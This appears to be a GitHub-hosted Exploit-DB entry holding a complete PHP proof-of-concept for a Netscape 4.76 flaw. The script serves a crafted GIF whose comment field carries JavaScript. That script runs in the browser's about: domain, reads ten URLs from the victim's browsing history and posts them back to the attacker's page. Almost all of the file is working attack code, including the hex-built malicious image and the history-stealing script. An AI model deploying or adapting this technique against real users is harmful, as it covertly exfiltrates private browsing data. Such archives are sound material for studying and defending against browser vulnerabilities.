forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path20791.php
More file actions
executable file
·154 lines (144 loc) · 6.34 KB
/
Copy path20791.php
File metadata and controls
executable file
·154 lines (144 loc) · 6.34 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
source: http://www.securityfocus.com/bid/2637/info
Due to a flaw in Navigator's security code, all URLs in the about: protocol are considered to be part of the same domain.
If arbitrary Javascript code is placed in a GIF's comment field, it is treated like a normal HTML page. The Javascript code will run from the image information page in the internal about: 'domain'. This issue has also been reported in commented JPEG files.
<?
/*
Netscape 4.76 gif comment flaw
Florian Wesch <fw@dividuum.de>
http://dividuum.de
*/
$self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
if (strlen($self)>64) {
echo "Url of $self is too long. 64 maximum.<br>";
echo "You can change this but I think 64 should be enough for anybody ;-)";
exit;
}
if (!isset($mode)) $mode="intro";
// If urllist is submitted
if (isset($u)) $mode="showhist";
switch ($mode) {
case "intro":
?>
<html>
<body>
<a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
</body>
</html>
<?
break;
case "frameset":
?>
<html>
<frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
<frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
<frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
</frameset>
</html>
<?
break;
case "loadhistory":
// replaces the current document with about:global using javascript
?>
<html>
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
</html>
<?
break;
case "showimageinfo":
?>
<html>
<head>
<meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
</head>
<body>
Waiting 5 seconds...<br>
<img src="<? echo $self; ?>?mode=evilgif">
</body>
</html>
<?
break;
case "evilgif":
// Gifs are supposed to be compressed. The program I
// used sucks :-)
header("Content-type: image/gif");
$gif ="4749463839610a000a00f70000ffffffffffccffff";
$gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
$gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
$gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
$gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
$gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="ffffffffffffffffffffffff0000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000000021feff";
$gif.=bin2hex(sprintf("%77s%s",
/*"<form action=".$self,' target=_parent name=s method=get >'.*/
/* I'm using POST so the submitted urls do not appear in the logfile */
"<form action=".$self,' target=_parent name=s method=post>'.
'<input name=u>'.
'</form>'.
'<script>'.
'f=parent.frames["foo"].document;'.
'l="";'.
/*'for(i=0;i<f.links.length;i++)'.*/
'for(i=0;i<10 ;i++)'.
'l+=f.links[i]+"|";'.
'document.s.u.value=l;'.
'document.'.chr(255).'s.submit();'.
'</script>'));
$gif.= "00000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000002c000000000a000a00000813004708";
$gif.="1c48b0a0c18308132a5cc8b061c28000003b";
echo pack("H".strlen($gif), $gif);
break;
case "showhist":
$urls=explode("|",$u);
echo "<h1>Top 10 urls in about:global</h1>";
foreach ($urls as $url) {
echo "<a href=$url>$url</a><br>";
}
};
?>